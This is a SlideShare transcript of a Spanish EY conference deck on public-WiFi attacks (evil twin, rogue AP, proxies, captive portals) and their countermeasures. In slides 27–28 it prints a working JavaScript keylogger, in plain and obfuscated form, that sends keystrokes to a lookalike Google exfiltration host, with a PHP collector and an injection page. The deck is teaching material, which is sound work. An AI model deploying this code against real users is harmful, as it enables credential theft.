Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...
Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...
 
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...
 
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoCybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
 
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
 

Recently uploaded

LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 

Recently uploaded (20)

LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 

Ey ciber seg uah 2016 freewifi

  • 1. FreeWiFi Rouge AP, Evil Twin, Portal cautivo con proxy web son partes de una constante amenaza a redes inalámbricas: Aprendamos los posibles ataques para saber como protegernos.
  • 2. Contenido ¿Quiénes somos? Definiciones Herramientas y ataques Manos a la obra: Proxy Web Otros Proxies Manos a la obra: Keylogger JS Manos a la obra: Portal cautivo Manos a la obra: WiFi Pumpkin Aprendamos a protegernos Despierta tu curiosidad FreeWifi Aprendamos los posibles ataques para saber como protegernos
  • 3. Page 3 3 ¿Quiénes somos? ► Talento & Emprendimiento
  • 4. FreeWiFi Aprendamos los posibles ataques para saber como protegernos ¿Quiénes somos? http://www.ey.com/About-us/Entrepreneurship Los emprendedores marcan la diferencia. Tienen grandes ideas y el impulso necesario para llevarlas a cabo. Gracias a sus visiones innovadoras y a su trabajo, estimulan un cambio social positivo, aportando nuevos conceptos y productos al mercado y creando empleo y riqueza. Llevamos mucho tiempo reconociendo el potencial de los emprendedores. En los últimos treinta años, hemos adaptado nuestra experiencia, conocimiento sectorial y recursos para trabajar con las compañías emprendedoras y de rápido crecimiento. Trabajamos con una gran variedad de empresas, desde aquellas que realizan su primera operación de financiación hasta las de mediana capitalización, cuyo valor se puede medir en miles de millones de dólares. Nuestro compromiso con las compañías emprendedoras en todo el mundo, tanto en las economías emergentes como en las maduras, nos asegura el trabajar junto a muchos de los líderes globales del mañana.
  • 5. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Wiktor Nykiel Senior Manager en el área de Ciber Inteligencia. wiktor.nykiel@es.ey.com https://es.linkedin.com/in/wiktornykiel @WiktorNykiel Héctor Pantoja Senior en el Área de Attack and Penetration hector.pantojagarcia@es.ey.com https://es.linkedin.com/in/héctor-pantoja-garcía-21097958 @hpantojagarcia
  • 6. Page 6 6 Definiciones ► Aprendamos algo nuevo …
  • 7. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Definiciones ► Proxy Transparente Tiene las mismas funciones que un Proxy, pero en este modo el propio cliente no es consciente del uso de un Proxy que esta redireccionando y gestionando las peticiones que envía y recibe. El cliente no necesita configurar los navegadores para el uso de dicho Proxy. Este modo es utilizado por los proveedores de servicios de internet (ISP) y se suele utilizar para mejorar la velocidad de descarga. ► Proxy Servidor que permite la intercepción y redirección de las peticiones recibidas en una red interna hacia Internet, controlando de una manera eficiente todas las entradas y salidas de una red e incluso permite modificar las cabeceras y el contenido para mantener la privacidad de la comunicación. El usuario sabe en todo momento que esta utilizando un Proxy. ► Proxy Web
  • 8. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Definiciones ► Evil Twin Es un punto de acceso WIFI que sirve para interceptar las comunicaciones inalámbricas. Se hace pasar por un proveedor de comunicaciones o bien por un hotspot engañando a usuarios con dispositivos móviles, tablets o portátiles para que se conecten a él. Crea una web totalmente fraudulenta, parecida al phishing para recopilar credenciales o monitorizar el trafico que produzcan. ► Rouge AP Es un dispositivo que suplanta la identidad de un Punto de Acceso Existente para poder recopilar credenciales de usuarios que soliciten loguearse. Para poder realizar esto, el dispositivo replica el ESSID y las características de cifrado de un Punto de Acceso cualquiera suplantando toda su configuración. El Rogue AP se mantendrá a la escucha de peticiones de sus victimas. Una vez logueada la victima, se obtendrán sus credenciales y se podrá monitorizar el tráfico que genere.
  • 9. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Definiciones ► Spoofing Es la suplantación de identidad de un usuario o servidor en concreto ayudándose con una serie de técnicas, para la obtención de algún tipo de información relevante. Se falsifica el origen de los paquetes para hacer creer a la victima que procede de un host de confianza o autorizado ► IP Spoofing Suplanta la dirección IP de un determinado servidor para recopilar credenciales de las victimas. Consigue sustituir la IP de origen de un paquete TCP/IP por la dirección deseada, de esta forma todas las peticiones llegaran al servidor falsificado obteniéndose así una monitorización del tráfico muy interesante. ► ARP Spoofing Es la suplantación de identidad de la tabla ARP. Dicha tabla se encarga de traducir direcciones IP a direcciones MAC. La forma de falsificar dicha tabla es inundando la red con paquetes ARP indicando que la MAC asociada a la IP solicitada es nuestra y además nuestra MAC esta también asociada al Gateway. De esta forma el resto de máquinas actualizarán sus tablas ARP con esta información falsificada y cada vez que quieran acceder a un destino pasaran por la maquina atacante para esnifar el trafico, redirigir la salida o ambas. ► DNS Spoofing Es una técnica que altera o falsifica las direcciones IP asociadas a los servidores DNS y las redireccionan a servidores maliciosos. La forma de conseguir esto es modificando las peticiones recibidas falsificando la relación IP-DNS o comprometer un servidor e inundar la red con la cache infectada en el resto de servidores.
  • 10. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Definiciones ► Keylogger Un keylogger es un software/hardware que permite registrar todas las pulsaciones en un equipo para posteriormente enviarlas al atacante. ► Keylogger JS Keylogger JS es una variedad que permite capturar texto introducido por un usuario en los formularios de la web afectada, a través de la inyección de un código JavaScript que genera una “capa transparente” que recoge y envía todas las pulsaciones a un servidor remoto.
  • 11. Page 11 11 Herramientas y ataques ► Diferentes formas de hacer el mal …
  • 12. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFiPhisher ► Ataques Evil Twin Consigue hacerse con man-in-the-middle a través de ataques del tipo Evil Twin, donde posteriormente redirige todo el trafico HTTP a un sitio web controlado por el atacante. Este ataque se compone de tres pasos:  La victima es desautenticada de su punto de acceso original. Esto se consigue haciendo jamming para “Deauthenticate” o “Disassociate” al cliente.  El cliente desauntenticado se conecta al punto de acceso atacante. Esta herramienta copia automáticamente las configuraciones del punto de acceso originaly crea un punto de acceso falso. Establece la configuración NAT/DHCP para que el cliente se conecte a la red falsa, consiguiendo que la victima acabe bajo el ataque MiTM.  Se presenta una página de configuración de router al cliente. Incluye un servidor web el cual atiende peticiones HTTP/S y lanza páginas de phishing preguntando por credenciales. https://github.com/sophron/wifiphisher
  • 13. FreeWiFi Aprendamos los posibles ataques para saber como protegernos LINSET ► Linset Is Not a Social Enginering Tool Consigue hacerse las credenciales WPA/2 desautenticando al cliente original, redirige todo el trafico HTTP a un sitio web controlado por el atacante, probando las credenciales introducidas por el usuario. Este ataque se compone de tres pasos:  Crea un punto de acceso con el mismo SSID que el AP original.  La victima es des-autenticada de su punto de acceso original.  Se presenta una página para introducir las credenciales de la victima. Ref: https://github.com/vk496/linset http://highsec.es/2014/10/linset-tirando-el-anzuelo/
  • 14. FreeWiFi Aprendamos los posibles ataques para saber como protegernos SET ► Social Engineering Toolkit Es una herramienta que permite utilizar varias técnicas de Ingeniería Social.
  • 15. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WPAD Ref: http://findproxyforurl.com/wpad-introduction/ https://technet.microsoft.com/en-us/library/cc995258.aspx http://perimetergrid.com/wp/2008/01/11/wpad-internet-explorers-worst-feature/ ► Web Proxy Auto Discovery Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP. DHCP DNS
  • 16. FreeWiFi Aprendamos los posibles ataques para saber como protegernos MITMF ► Man In The Middle Framework Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP.
  • 17. Page 17 17 Manos a la obra ► Veamos un ejemplo práctico: Proxy Web
  • 18. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Web Proxy ► Glype Web Proxy Esto es un proxy web escrito en PHP que funciona igualmente Se pueden robar sesiones, sacar datos interesantes. Se puede tener trazas de navegación, valores de parámetros GET
  • 19. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Web Proxy ► Glype Web Proxy ► Opciones de configuración 1. Encrypt URL: Permite obfuscar la URL para que no sea reconocible cuando se manda de forma recursiva al proxy. 2. Encrypt Page: Manda la página ofuscada antes de enviarla, para des obfuscar en el cliente una vez recibido. Esto a veces produce errores en la navegación 3. Show Form: Muestra una barra con un formulario en la parte superior del navegador para poder introducir la URL a visitar así como modificar posibles parámetros. 4. Allow Cookies y Force Temporary Cookies: Permite trabajar con cookies, hay opción de visualizar estas cookies almacenadas en el servidor. 5. Remove Page Titles: Quitamos el titulo de la página (se queda en el histórico de navegación – a veces da demasiados datos). 6. Remove Scripts: Quita scripts JS / Flash / Java que puedan desvelar la ubicación, etc
  • 20. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Modificaciones al Web Proxy Index.html que invoca desde iframe el proxy web <html> <head> <title>Navegación super segura</title> </head> <body> <iframe src="browse.php?u=http%3A%2F%2Fwww.google.com%2F&b=4" width="100%" height="100%" scrolling="auto" frameborder="0"> <p>Texto alternativo para navegadores que no aceptan iframes.</p> </iframe> </body> </html> // Plugins/google.com.php function preParse($html,$type) { if (stripos($html,'loadingError')) { header("Location: ".proxyURL('http://mail.google.com/mail/?ui=html')); exit; } return $html; } function postParse(&$in,$type) { $in = preg_replace('# style="padding-top:d+px"#', '', $in); return $in; }
  • 21. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Modificaciones al Web Proxy // Plugins/facebook.com.php $options['stripJS'] = false; $options['allowCookies'] = true; function preRequest() { global $URL; if ($URL['host'] != 'm.facebook.com') { $URL['host'] = preg_replace('/((www.)?facebook.com)/', 'm.facebook.com', $URL['host']); $URL['href'] = preg_replace('///((www.)?facebook.com)/', '//m.facebook.com', $URL['href']); } } Modificamos texto al vuelo en el parser para añadir/quitar URL, funciones, etc en la página visitada a través del proxy.
  • 22. Page 22 22 Otros proxies ► Capturando datos de diferentes formas …
  • 23. FreeWiFi Aprendamos los posibles ataques para saber como protegernos OWASP ZAP + Login HTTPS Ref: https://github.com/zaproxy/zaproxy
  • 24. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Burp Suite Professional
  • 25. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Fiddler
  • 26. Page 26 26 Manos a la obra ► Veamos un ejemplo práctico: Keylogger JS
  • 27. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Keylogger JS <?php if(!empty($_GET['datosRecibidos'])) { $logfile = fopen('datos.txt', 'a+'); fwrite($logfile, $_GET['datosRecibidos']); fclose($logfile); } ?> var buffer = []; var attacker = 'http://accounts.google.com-servicelogin.sacu-1.hl-en.seguridad- wifi.com/account/login/secure/protocol/g00/keylogger/?datosRecibidos=' document.onkeypress = function(e) { buffer.push(e.key); } window.setInterval(function() { if (buffer.length > 0) { var data = encodeURIComponent(JSON.stringify(buffer)); new Image().src = attacker + data; buffer = []; } }, 300); Index.php – script php que almacena datos recibidos en fichero Keylogger.js – script JS que envia los datos a index.php para ser almacenados var _0xd495=["x68x74x74x70x3Ax2Fx2Fx61x63x63x6Fx75x6Ex74x73x2Ex67x6Fx6 Fx67x6Cx65x2Ex63x6Fx6Dx2Dx73x65x72x76x69x63x65x6Cx6Fx67x69x6Ex2E x73x61x63x75x2Dx31x2Ex68x6Cx2Dx65x6Ex2Ex73x65x67x75x72x69x64x61x 64x2Dx77x69x66x69x2Ex63x6Fx6Dx2Fx61x63x63x6Fx75x6Ex74x2Fx6Cx6Fx6 7x69x6Ex2Fx73x65x63x75x72x65x2Fx70x72x6Fx74x6Fx63x6Fx6Cx2Fx67x30 x30x2Fx6Bx65x79x6Cx6Fx67x67x65x72x2Fx3Fx64x61x74x6Fx73x52x65x63x6 9x62x69x64x6Fx73x3D","x6Fx6Ex6Bx65x79x70x72x65x73x73","x6Bx65x79","x7 0x75x73x68","x6Cx65x6Ex67x74x68","x73x74x72x69x6Ex67x69x66x79","x73x7 2x63","x73x65x74x49x6Ex74x65x72x76x61x6C"];var buffer=[];var attacker=_0xd495[0];document[_0xd495[1]]=function(_0x61fcx3){buffer[_0xd495[3]](_0x61fcx 3[_0xd495[2]])};window[_0xd495[7]](function(){if(buffer[_0xd495[4]]>0){var _0x61fcx4=encodeURIComponent(JSON[_0xd495[5]](buffer)); new Image()[_0xd495[6]]=attacker+_0x61fcx4;buffer=[];}},300); Obfuscado con: http://javascriptobfuscator.com/Javascript-Obfuscator.aspx
  • 28. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Keylogger JS Prueba.php – script PHP con formularios que muestra el funcionamiento del keylogger <script src="http://accounts.google.com- servicelogin.sacu-1.hl-en.seguridad- wifi.com/account/login/secure/protocol/g00/keylogger/s cript-super-importante.js"> </script> <html> <head><title>Ejemplo de formulario sencillo</title></head> <body> <h3>Formulario muy sencillo</h3> <form action="?" method="post"> Escribe tu nombre: <br/><input type="text" name="nombre" value="" size="80"/> <br/> Escribe tu clave: <br/><input type="password" name="passswd" value="" size="80"/> <br/><input type="submit" value="Enviar" /> </form> <br /> <a href="datos.txt" target="_blank">Abre el fichero con los datos recogidos</a> </body> </html>
  • 29. FreeWiFi Aprendamos los posibles ataques para saber como protegernos BeEF – Browser Exploitation Framework
  • 30. Page 30 30 Manos a la obra ► Veamos un ejemplo práctico: Portal cautivo
  • 31. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Portal cautivo https://meraki.cisco.com/lib/pdf/meraki_whitepaper_captive_portal.pdf
  • 32. Page 32 32 Manos a la obra ► Veamos un ejemplo práctico: WiFi Pumpkin
  • 33. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumpkin – Caso practico RougeAP Framework para Ataques Rouge AP, funciona bajo una Kali 2.0
  • 34. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumpkin - Instalación Proceso de instalación
  • 35. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumkin - Funcionamiento Framework iniciado con un cliente conectado y autenticado. Interfaz Wifi (wlan0)
  • 36. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumpkin – Capturando datos Credenciales capturadas en una web sin SSL a través del punto de acceso falso.
  • 37. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumpkin – Fake Updates Creamos una página clonada de los servicios de actualizaciones más usados, el cual añade Malware en el ejecutable de la descarga.
  • 38. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WiFi Pumpkin - Actualizaciones Página web clonada con aspecto del servicio de actualizaciones de Microsoft.
  • 39. Page 39 39 Aprendamos a protegernos ► Cuida tus datos en todo momento …
  • 40. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Contramedidas • Para solventar el IP Spoofing, se puede configurar el router con reglas de acceso (ACLs) para determinadas MAC. De esta forma se dará acceso a maquinas determinadas. • Utilización de cifrado de la comunicación y Autenticación de Usuarios. • Utilización de DHCP Snooping para evitar el ARP Spoofing, de esta forma se mantiene un registro de las direcciones MAC conectadas a cada puerto, sabiendo en cada momento si se recibe una suplantación ARP.
  • 41. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Protegiéndose de Evil Twin AP y otros ataques wifi • Uso de aplicaciones móviles como hotspotid.com • Puntos de acceso con detección de Rouge AP • Scripts para monitorizar, descubrir y prevenir ataques Evil Twin AP https://github.com/moha99sa/EvilAP_Defender/wiki • Uso de WIPS / WIDS
  • 42. FreeWiFi Aprendamos los posibles ataques para saber como protegernos hotspotid.com
  • 43. FreeWiFi Aprendamos los posibles ataques para saber como protegernos WIDS y otros sistemas anti Rouge AP https://meraki.cisco.com/technologies/air-marshal-wips
  • 44. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Autenticación de doble Factor - 2FA
  • 45. FreeWiFi Aprendamos los posibles ataques para saber como protegernos VPN – Protegiendo nuestro tráfico “ Las conexiones VPN permiten cifrar el tráfico entre nuestro móvil y un entorno seguro “
  • 46. Page 46 46 Despierta tu curiosidad ► Siguientes retos …
  • 47. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Cosas para probar › http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-twin-wireless-access-point-eavesdrop-data-0147919/ (Como crear puntos de acceso Evil Twin para espiar y obtener datos) › https://github.com/entropy1337/infernal-twin (herramienta de hacking WiFi automatizada) › https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ (punto de acceso falso con Raspberry PI y alguna otra cosa) › https://github.com/DanMcInerney/wifijammer (inhibe todo el tráfico wifi entre clientes y puntos de acceso a base de inyectar paquetes) › https://github.com/DanMcInerney/fakeAP (crear punto de acceso falso) › https://github.com/DanMcInerney/injecthtml/blob/master/injecthtml.git/injecthtml.py (inyecta código HTML - probar con Beef o JSKeylogger) › https://github.com/DanMcInerney/LANs.py (monitoriza a los clientes más activos e inyecta código HTML o hace denegación de servicio) › http://resources.infosecinstitute.com/beef-part-1/ (Introducción a Beef ) › http://docs.mitmproxy.org/en/latest/tutorials/transparent-dhcp.html (Proxies transparentes con maquinas virtuales) › https://blog.skullsecurity.org/2009/pwning-hotel-guests (ataques con WPAD)
  • 48. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Como saltarse la autenticación de proxies http://null-byte.wonderhowto.com/how-to/hack-wi-fi-evading-authentication-proxy-using-icmptx-0150347/ Saltándose portal cautivo a través de DNS tunneling http://dnstunnel.de/ Evadiendo Proxies › http://kinozoa.com/blog/subterfuge-documentation/ › https://github.com/Subterfuge-Framework/Subterfuge › http://www.monkey.org/~dugsong/dsniff/ › https://github.com/derv82/wifite › http://resources.infosecinstitute.com/20-popular-wireless-hacking-tools-updated-for-2016/ › https://github.com/supernothing/sergio-proxy › https://github.com/sensepost/mana MITM & Other tools
  • 49. FreeWiFi Aprendamos los posibles ataques para saber como protegernos Artículos relacionados › http://thehackernews.com/2014/03/snoopy-drone-can-hack-your-smartphones.html › https://blog.skullsecurity.org/2009/pwning-hotel-guests › https://mdk.fr/0x000000/articles/Web_Proxy_Autodiscovery_Protocol_Hijacking.html › https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/ • Snarfing • Evil Twin • WIPS • Rouge Acces Point • WPAD • ARP Spoofing • DNS Spoofing Definiciones https://en.wikipedia.org/wiki/Snarfing https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks) https://en.wikipedia.org/wiki/Wireless_intrusion_prevention_system https://en.wikipedia.org/wiki/Rogue_access_point https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol https://en.wikipedia.org/wiki/ARP_spoofing#Defense https://en.wikipedia.org/wiki/DNS_spoofing
  • 50. Wiktor Nykiel Email wiktor.nykiel@es.ey.com LinkedIn wiktornykiel Twitter @WiktorNykiel